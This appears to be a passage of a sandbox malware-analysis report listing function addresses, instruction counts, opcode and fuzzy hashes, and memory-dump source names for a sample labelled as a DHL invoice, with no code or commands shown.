Opcode ID: 420d396d4e01b73aa96c3501b869b91bae1c9312964f6dc1c46b7935219f00ce
Instruction ID: c5f8b49e73d4ae89c9937ba8d14b57e4e7fa0a612ff1158d8133c48efae93467
Opcode Fuzzy Hash: 420d396d4e01b73aa96c3501b869b91bae1c9312964f6dc1c46b7935219f00ce
Instruction Fuzzy Hash: 6F0171393005149BD3159B24D458A2B7BA6FB89711F108168E5068B790CF75EC02CBD2

Function 05C240A8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17fc1d55f52fa5639bec1270040947d19fe8f35d9ff510795639f04f940739c4
Instruction ID: 6e20010af415977ca7c3d7c04d87eb24cd0ce5c4ca18e94a57a3f7c72255e225
Opcode Fuzzy Hash: 17fc1d55f52fa5639bec1270040947d19fe8f35d9ff510795639f04f940739c4
Instruction Fuzzy Hash: 7DF062313001109FC7049A2AD894F6AF7DAFBC8754B548179E609CB366DA36DC01C7E2

Function 05C17C39 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25987657bf004dea6cb083d7a246bf7158beeb4b8c98d33564a7563cc6f00e6c
Instruction ID: 2aa15ba41ac332b102e844ece6b098fb913963eef0547864487653410aa5a672
Opcode Fuzzy Hash: 25987657bf004dea6cb083d7a246bf7158beeb4b8c98d33564a7563cc6f00e6c
Instruction Fuzzy Hash: DD01F6B1D19209DFCB40DFA8D8856AEBBF4EB09301F2045A9E80AE3351E7754A81DB51

Function 05C2E798 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615d5c363e5be746ba8e0c78563fbf34b8c8d4a544a93d4321c328df4560ebff
Instruction ID: 0c1d205dc4ce1ee1b5ae5404cf1aacd06ac02fad7673f18e23ab1a87653d177f
Opcode Fuzzy Hash: 615d5c363e5be746ba8e0c78563fbf34b8c8d4a544a93d4321c328df4560ebff
Instruction Fuzzy Hash: 47F0AF312003049FC7218F58D980E9AFBA6EF95310B158A3AE8568B365DB70AD4D8B50

Function 05C2F630 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f1354d39aef06a4e7264e6f5738bd481f1599900afed57075c5df09d30aa59e
Instruction ID: 1a7a82e320fb2cf7ff57eb887077a27f262b882c342215a77093ee4f51afb9ce
Opcode Fuzzy Hash: 4f1354d39aef06a4e7264e6f5738bd481f1599900afed57075c5df09d30aa59e
Instruction Fuzzy Hash: 110181393405149FC718DB24D05892ABBA6FBCC711B108528F9068B790CF31EC42CBD5

Function 05C22300 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ec762bb01e3c96027f6b3f091c99ef9fcaff664d55d46647afdfecc5b18234
Instruction ID: 1757c327a12489ed2ea69223bfa55eebaa00661cf145cbe96f3e70e9a64b3cc1
Opcode Fuzzy Hash: 57ec762bb01e3c96027f6b3f091c99ef9fcaff664d55d46647afdfecc5b18234
Instruction Fuzzy Hash: 86F02466B4D3A14FE32207785C10325AFE2ABD6210F1948EAD482CF2A6D997E802C751

Function 05C22E72 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c5c91304c9b55c25c255a2067a8e39e74782dc52c387e82424815ffce2da0f4
Instruction ID: f4a8a58cb884a6d2ec6a5dd275bb79952be73ee10888f2ff40f8423c78561aa8
Opcode Fuzzy Hash: 2c5c91304c9b55c25c255a2067a8e39e74782dc52c387e82424815ffce2da0f4
Instruction Fuzzy Hash: A0F090393047509FC3118F69D884D8ABBBAFF8A61570644AAF545CB321DB71D8049B60

Function 05C2B3FF Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d31021b25a05d6193288b1e654b06eee709f1b8f03109076b26a82070e72c987
Instruction ID: a5cd823bef847697a7d7e04b5702eba1755d9a5b974579bf87ab6c107ad00601
Opcode Fuzzy Hash: d31021b25a05d6193288b1e654b06eee709f1b8f03109076b26a82070e72c987
Instruction Fuzzy Hash: A4F0B4A270E2924FC712072D6C50368FBB1EF56648F5545AAD981C7367D6109D054B91

Function 05C222A8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5bbb230ca0453b02257b147a25921d2232a83c9a60a44d69b54353dadf08d0a
Instruction ID: 2d30f9a072fbab2982ce90a8bf570d8ce531366236738c1bc8aeeb71aa71ae8b
Opcode Fuzzy Hash: a5bbb230ca0453b02257b147a25921d2232a83c9a60a44d69b54353dadf08d0a
Instruction Fuzzy Hash: 16F0E975B443215FE3148759980072BF7E9FBC9720F144829E90A9B354CAB6BC418BD4

Function 0097D76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035800022.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97d000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b932530e1f992295e972c6f8f3cdd41fecb49afedbfdc380442d2cad45dd28da
Instruction ID: 1bb8ef1a1e19e812f9138e0ab136d7cc1a53b5c225fc04fc60b3c68faedba9e3
Opcode Fuzzy Hash: b932530e1f992295e972c6f8f3cdd41fecb49afedbfdc380442d2cad45dd28da
Instruction Fuzzy Hash: 14F062724093449EE7148A16D8C4B62FFACEF51724F18C55AED4C4A286C3799C44CA71

Function 05C11406 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa5e7bd8e1ae6244eb9975d4b3d56015d69484c9b753d67f2109a31bbb0efa99
Instruction ID: 0b3e97b30644b4ac35c157cf5af0af800129d55775d420f33de5788872981dba
Opcode Fuzzy Hash: aa5e7bd8e1ae6244eb9975d4b3d56015d69484c9b753d67f2109a31bbb0efa99
Instruction Fuzzy Hash: 7011CEB09102288FEB69DF65D98DBDCB6B0BB06300F1045EAE909A7291CB744AC1CF45

Function 05C2F3A8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f25942a2dedd257fc83f00f551d3eb38c8c48f55b150a1a0f6720309f01700a
Instruction ID: de8a062f23f2adc5259f050074af8bb9863a9b75c78119cf51ab6dbd3cb33122
Opcode Fuzzy Hash: 7f25942a2dedd257fc83f00f551d3eb38c8c48f55b150a1a0f6720309f01700a
Instruction Fuzzy Hash: C7F06D3A310200AFD7149B29D848F2A7BAAFFC9710F054469F9468B3A0CB71EC02CB91

Function 062343E3 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e2db41bfafa16107d05fa3d9044583d87856850b186d31fb0ad86bf27a83720
Instruction ID: 08e06a6ce420449c1741652a7ca683d58cae40be94885794bcde8e24a71deba4
Opcode Fuzzy Hash: 1e2db41bfafa16107d05fa3d9044583d87856850b186d31fb0ad86bf27a83720
Instruction Fuzzy Hash: 5511BA74A05228CFDB64DF28C885A9ABBF5FB48300F40C2E9991DA7794DB745E81CF11

Function 05C21DC7 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b77e60e33ff259addc8875d1a0acdddf0fd19ba65d0493989d782de1624672a
Instruction ID: 4e55b3d403edf3bfb7e71168ec3e5af8053db461d638c6f738c0f82bf31cee4d
Opcode Fuzzy Hash: 0b77e60e33ff259addc8875d1a0acdddf0fd19ba65d0493989d782de1624672a
Instruction Fuzzy Hash: 9AF090B2A05304AFC711CB65D882AD97BB5EB55200F4584E9E408DB301EA316E02D791

Function 05C10AF1 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5084aaf5b7f9969c7bbc759f0689e87e400175e2a5b6238a468af72910f76ca3
Instruction ID: 2d79c0315efcc97d4048dbab16c276c286181e7c9dc5ce29000f49ff0e6ce74a
Opcode Fuzzy Hash: 5084aaf5b7f9969c7bbc759f0689e87e400175e2a5b6238a468af72910f76ca3
Instruction Fuzzy Hash: 9901287081522CCFDB54DF65D95ABDDB7B4BF0A310F1006D9A909A6282DB344AC08F85

Function 05C2F3B8 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fefea085135e6a6eaadf5ab2db7e9daef7f3d82b1b9f86355b4164d187d16866
Instruction ID: 3a20e62f87a7b3d3545d2df731365666c0cc6e8fc63146dbcb80383631be299e
Opcode Fuzzy Hash: fefea085135e6a6eaadf5ab2db7e9daef7f3d82b1b9f86355b4164d187d16866
Instruction Fuzzy Hash: 7EF05E39310600AFC714DF19D858D2A77AAFFCC721B114469F9068B3A0CA71EC02DF91

Function 05C2B467 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c83880aeef5a0d24a33540a7bf5e6f0918acf317de881c8f3f4de57391ca0a5
Instruction ID: 818442f02658cefc0057ca21c5b26ce1208cef33dc710b0a7e47960915f69140
Opcode Fuzzy Hash: 4c83880aeef5a0d24a33540a7bf5e6f0918acf317de881c8f3f4de57391ca0a5
Instruction Fuzzy Hash: 4AF0A7313443495FC7119A19EC4498BFFAAFFD1264714853AE1594B225DE70E84AC791

Function 05C2CEC0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16957f7db588db62692897d8af512eaeb471af94be286225c44619cd534c87c9
Instruction ID: 2e70a3d76163b30a158c59fb18c9005c8cfff5d8010eb5eaf2d71348ac419cd7
Opcode Fuzzy Hash: 16957f7db588db62692897d8af512eaeb471af94be286225c44619cd534c87c9
Instruction Fuzzy Hash: E4F0302670C3814FC7125635A8642993FB19F6750430B549AD4C1CB356D9289D0A8B11

Function 05C176CA Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d69480a60a06648e3615902927cdaad8ada32811e13bf3bb0e546e6853e02298
Instruction ID: 4f6b7207326aa62c3a35d4197a65a6170b950a2c64abdcf0edf150ab24cdb796
Opcode Fuzzy Hash: d69480a60a06648e3615902927cdaad8ada32811e13bf3bb0e546e6853e02298
Instruction Fuzzy Hash: D401DD34904218DFDB14CF64E888BA9BBB2FB4A304F5084A6E81EA7251CB705A85DF44

Function 05C13200 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1839946d5330b3fd8b727ec203c1c54f3c13f1489c04d4b389047583293bd795
Instruction ID: 94fd5be6ee8c11e7c977b4deceaa0b6ab9e43f1232a00ed64cb42fc1df9e7917
Opcode Fuzzy Hash: 1839946d5330b3fd8b727ec203c1c54f3c13f1489c04d4b389047583293bd795
Instruction Fuzzy Hash: EBF036719082C5AFC755CF98D8409ADBFF5AB1A311F14C5CAA8649B292C6359A41DB10

Function 00A50857 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18c718ea2a4dccff5ffbdd0f4ec599b11745fdd5f67e602d90dd88b01ccf05af
Instruction ID: 7206aff9e33cb40ff635beaaaedc69f1944ffceaf95877385c2ae9003093f510
Opcode Fuzzy Hash: 18c718ea2a4dccff5ffbdd0f4ec599b11745fdd5f67e602d90dd88b01ccf05af
Instruction Fuzzy Hash: 99F0153834C3848FDB05DB74EAA8A593FB1AF4A700F2501EAE841CB3B2C664DC00CB11

Function 05C2455F Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 639974685a4419316679b6caf1f54cd7ff3cb585d551e9a3556beb79be2dcad7
Instruction ID: 679fdeb77806145fe78e940d15cd6c4ec19bbcec95496ea07bf06036c4c29aad
Opcode Fuzzy Hash: 639974685a4419316679b6caf1f54cd7ff3cb585d551e9a3556beb79be2dcad7
Instruction Fuzzy Hash: 8CF08276A145549FDF19CF68D0887DCBFB3FF84205F0884A9E04997245DB705686CF84

Function 05C20FE9 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c35a2dcd5923065885d06a677f89298e0c86a869be6645a1406e0dc384ee88a
Instruction ID: 032e50a958b500f9658952476d0504248c2640d4505bab59873a0a9d9e4f47bc
Opcode Fuzzy Hash: 2c35a2dcd5923065885d06a677f89298e0c86a869be6645a1406e0dc384ee88a
Instruction Fuzzy Hash: 64F08C70E0D288EFC740DFA8C84029CBFF0EB4A210F1884EED809D3352D635AA05DB41

Function 05C18A9A Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a49913d15faf70681ef20e6c148ea65c201c7a8cfb56749f6951ddc6e3918862
Instruction ID: 50e40ce129628e7541878f2d4ec07bea4e3904aa7fe07497328b68a0416761f2
Opcode Fuzzy Hash: a49913d15faf70681ef20e6c148ea65c201c7a8cfb56749f6951ddc6e3918862
Instruction Fuzzy Hash: AB013C30809A68CFDB20CF14DC88B99B7B2FF46306F1005D5D80A6A245C7744EC5DF0A

Function 05C13210 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a08aa6f28a8d61c8ff221efa0e75d383de6a9e1428af2d7605d56f3560e740c
Instruction ID: 7790764963d2efc8b92fdfe8d21efe23abc2171d5e4f1f52abf236feba884a40
Opcode Fuzzy Hash: 1a08aa6f28a8d61c8ff221efa0e75d383de6a9e1428af2d7605d56f3560e740c
Instruction Fuzzy Hash: FCF01C74D08248EFCB84DFA9D840AADBBF8AB49310F14C49AAC58D7341D6359B51EF50

Function 05C264B8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3060ad7d1a87c1ed093a7b81db232caf9f06d42db4f9d4940c8edfff15be6a8
Instruction ID: 28ad0b6b9df078a46d412ef21cd229828ea1bd283634e6bfe2315fd0c02ab02f
Opcode Fuzzy Hash: f3060ad7d1a87c1ed093a7b81db232caf9f06d42db4f9d4940c8edfff15be6a8
Instruction Fuzzy Hash: 5BE0D871B483908FDB21D6708D063653B716F1AA51F9908EEC1969F385DC61D841C721

Function 05C20B48 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e0ad4d8dad21156fc4c616e3ec3dc542c09918b6815c3204d1680f6ad4e10a
Instruction ID: ced7c0dff9232c1edaeb83f22d08332be8d61fa8639bcdb5b1f2061226720eb5
Opcode Fuzzy Hash: 30e0ad4d8dad21156fc4c616e3ec3dc542c09918b6815c3204d1680f6ad4e10a
Instruction Fuzzy Hash: E8F0E57590D244EFC701CFA4D84499CBF75AB42304F14909AD84067352D6319A02DB91

Function 00A563CA Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ebe12f359d4d601cc2aa15baeb5175aa3a7bc26e963c5e94d79e32e854ab389
Instruction ID: c67efd3eba2fcd080c8fe88c0a067775a1d70ffe3279976777eadd4dca01c25b
Opcode Fuzzy Hash: 5ebe12f359d4d601cc2aa15baeb5175aa3a7bc26e963c5e94d79e32e854ab389
Instruction Fuzzy Hash: 96018C74918228CFDB68DF24DD987A8BBF1BB59311F0488D9D84AA2350DB700E84DF80

Function 05C24570 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 259e5e88b0be6950fb9d41924cbfc5bd1958e71e032d8fc081323c7c4d38f4a3
Instruction ID: c1d8309b85f61e535a733120fa94d64e45f2a4c05524624f5cf8c72a143b8d77
Opcode Fuzzy Hash: 259e5e88b0be6950fb9d41924cbfc5bd1958e71e032d8fc081323c7c4d38f4a3
Instruction Fuzzy Hash: 0EF06575A14618AFDF19CF54D4886DDBFB7FB84210F0484A9E00A97240DFB45A81CBC4

Function 05C20E39 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 180fdb77fd4a20b42c9b6cda290b52d849e8a17bb618d960509a62ddccacde1d
Instruction ID: f47e8509988b5df6901b6168bf15b9d591720ebd20efe16b54c0fb86bb243167
Opcode Fuzzy Hash: 180fdb77fd4a20b42c9b6cda290b52d849e8a17bb618d960509a62ddccacde1d
Instruction Fuzzy Hash: 8BF0ED71A0D208EFCB01CFA8E88059DBFB5AB16300F1480DAE880A7352C631AE45DB91

Function 05C2B478 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6f1931964e631ddb75c69a23d553364c8eeea0b96089b35445c68489602b207
Instruction ID: f4faeabe295f6f9011c5923fe557112b5267895c3ac9dfc6f0f7df38496811c1
Opcode Fuzzy Hash: b6f1931964e631ddb75c69a23d553364c8eeea0b96089b35445c68489602b207
Instruction Fuzzy Hash: 5BE012313402055FC7149A1AE984C4BFB9AEEC42647109539E11A87225DE70ED498691

Function 00A50868 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2a319f6f33b466a301b5c621fdf8034f43946dd9c19b143b8d3c6ceb6504d34
Instruction ID: b6bae805038f85480e234e136c092cf43d756559542536a098f14ff30a689b19
Opcode Fuzzy Hash: a2a319f6f33b466a301b5c621fdf8034f43946dd9c19b143b8d3c6ceb6504d34
Instruction Fuzzy Hash: 60E09238340200CFC744EB64EA99E1A3BE5AF48711F1101A4E906CB7B6DAB1EC008B51

Function 00A54A28 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcd8c1e4fdc77e088253a53dc4bbc208d6ecdc665a38b216e41d423dd7de30fe
Instruction ID: 6376238f9aa79555147759571023a5643db08cd1babe3b37f105ad5fd374bf92
Opcode Fuzzy Hash: bcd8c1e4fdc77e088253a53dc4bbc208d6ecdc665a38b216e41d423dd7de30fe
Instruction Fuzzy Hash: 31F05E30D052548EDB608B25C94469D7E72AB4A395F0591DAC80A7B691C6305AC9DF46

Function 06236423 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4cac1759431995044b28e8f65c6eb1da1aead6bd1a86cd9d84554d1a81f4d2
Instruction ID: f360a3a6c1e7eb1248ea45fc2a2f1f73bcb3592b9a04cfd601ce5aee525d9858
Opcode Fuzzy Hash: 0b4cac1759431995044b28e8f65c6eb1da1aead6bd1a86cd9d84554d1a81f4d2
Instruction Fuzzy Hash: DDF0FE74611228CFDB68EF14C999B5AB7F6FB89300F0080D5A51DA7399CB34AE848F11

Function 0624D218 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f16d3124b1a689f4c776739a03c08d2d400bda955f11226b85d8b64eeb4519
Instruction ID: da6fd4468fd79d582fa65dced9aa94f6654b5804eabd6144c34758e33a3b9d95
Opcode Fuzzy Hash: e3f16d3124b1a689f4c776739a03c08d2d400bda955f11226b85d8b64eeb4519
Instruction Fuzzy Hash: DBE0C974E18208EFCB84DFA8D44069CFBF4EB48310F10C4A9EC0893351DA719A51DF80

Function 0624A240 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f16d3124b1a689f4c776739a03c08d2d400bda955f11226b85d8b64eeb4519
Instruction ID: 68090deb07dfe7ecc07c295af06ff43100f609cf966e7b97849e292d5b094722
Opcode Fuzzy Hash: e3f16d3124b1a689f4c776739a03c08d2d400bda955f11226b85d8b64eeb4519
Instruction Fuzzy Hash: DAE0C974E19208EFCB84DFA9D44069CFBF4EB48310F10C0A9AC1893355DA329E51EF80

Function 06245920 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

